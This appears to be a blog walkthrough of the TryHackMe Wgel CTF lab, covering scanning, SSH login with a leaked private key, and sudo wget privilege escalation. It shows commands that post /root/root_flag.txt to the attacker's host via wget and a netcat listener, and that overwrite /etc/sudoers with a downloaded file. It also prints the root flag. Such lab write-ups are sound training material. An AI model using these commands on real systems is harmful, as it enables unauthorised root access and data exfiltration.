-->

  • TryHackMe Wgel CTF Exfiltrate the root flag

     


    TryHackMe Wgel CTF Exfiltrate the root flag

     

    Wgel CTF is a TryHackMe machine, after listing the website we found a private key that gave us SSH access. We escalate privileges by modifying the sudoers file with Wget.


    First we start with NMAP tool. TCP port scan, we see two open ports http (80) and ssh (22).

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo nmap -O 10.10.56.251                        
[sudo] password for hackerboy: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 23:49 IST
Nmap scan report for 10.10.56.251
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/28%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=I%G=Y%TM=64C406D
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=I%TS=A)SEQ(SP=1
OS:05%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O
OS:3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.04 seconds
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 



     

    HTTP

    Apache is running on port 80. 




     We analyzed the source code of the apache index and found a comment that is not common in the apache index.

     

    SSH - Jessie

     

    GOBUSTER

    Directory and file scanning with gobuster.

      

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo gobuster dir -u http://10.10.56.251/ -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
[sudo] password for hackerboy: 
/.html                (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 11374]
/index.html           (Status: 200) [Size: 11374]
/server-status        (Status: 403) [Size: 277]
/sitemap              (Status: 301) [Size: 314] [--> http://10.10.56.251/sitemap/]
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$

     

     

    Page web and /sitemap/

     
            


     

     Again we do a scan with gobuster but now to the page we found ( /sitemap/). 


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo gobuster dir -u http://10.10.56.251/sitemap -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
[sudo] password for hackerboy: 

/.htpasswd.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.ssh                 (Status: 301) [Size: 319] [--> http://10.10.56.251/sitemap/.ssh/]
/about.html           (Status: 200) [Size: 12232]
/blog.html            (Status: 200) [Size: 12745]
/contact.html         (Status: 200) [Size: 10346]
/css                  (Status: 301) [Size: 318] [--> http://10.10.56.251/sitemap/css/]
/fonts                (Status: 301) [Size: 320] [--> http://10.10.56.251/sitemap/fonts/]
/images               (Status: 301) [Size: 321] [--> http://10.10.56.251/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 317] [--> http://10.10.56.251/sitemap/js/]
/services.html        (Status: 200) [Size: 10131]
/shop.html            (Status: 200) [Size: 17257]
/work.html            (Status: 200) [Size: 11428]
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$

     


     

    SSH - Jessie

    We start session with Jessieand the private key we found earlier, we get an ssh shell and our first flag user_flag.txt .

     

    An id_rsa key can be used as an alternative method to log into SSH. Meaning, we do not need a password! Maybe we can try this against the Jessie user found earlier?


    Initial Access


    Download the id_rsa key from the webserver with wget:

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ wget http://10.10.56.251/sitemap/.ssh/id_rsa -O ./id_rsa.txt                                            
--2023-07-29 01:22:03--  http://10.10.56.251/sitemap/.ssh/id_rsa
Connecting to 10.10.56.251:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1675 (1.6K)
Saving to: ‘./id_rsa.txt’

./id_rsa.txt                              100%[=====================================================================================>]   1.64K  --.-KB/s    in 0s      

2023-07-29 01:22:03 (43.1 MB/s) - ‘./id_rsa.txt’ saved [1675/1675]

                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$

     

    Now login as Jessie:

    $ chmod 600 id_rsa.txt
    $ sudo chown hackerboy:hackerboy id_rsa.txt
    $ ssh jessie@10.10.56.251 -i id_rsa.txt

     

     


     


     

     

    Privilege Escalation


    Next, we need to read the root user flag. In order to do so, we need root privileges.

    A good first check is to run sudo -l to list what we can run as root:

     

     

    Click on this link to learn about sudo -l (all about enumeration) - CLICK HERE


     

     


     There are two entries here: (1) we can run all commands as root, but need to know Jessie’s password, and (2) we can run wget as root.

    According to the amazing GTFOBins repo we can use wget to read files. We’ll use this technique to read the root user’s flag:

     

    sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.22.119:4545

    # This is our system IP 10.9.22.119

    # we will same port from both side 4545


    Netcat listener

    nc  -lvp 4545


    Root flag - b1b968b37519ad1daa6408188649263d

    And in the wgel machine we execute the wget command with sudo which will overwrite the file /etc/sudoers.

    We are located in the folder /etc/and we execute:

    sudo /usr/bin/wget 10.9.22.119:4545/sudoers --output-document=sudoers





    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

    • 0 comments:

    Post a Comment

    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.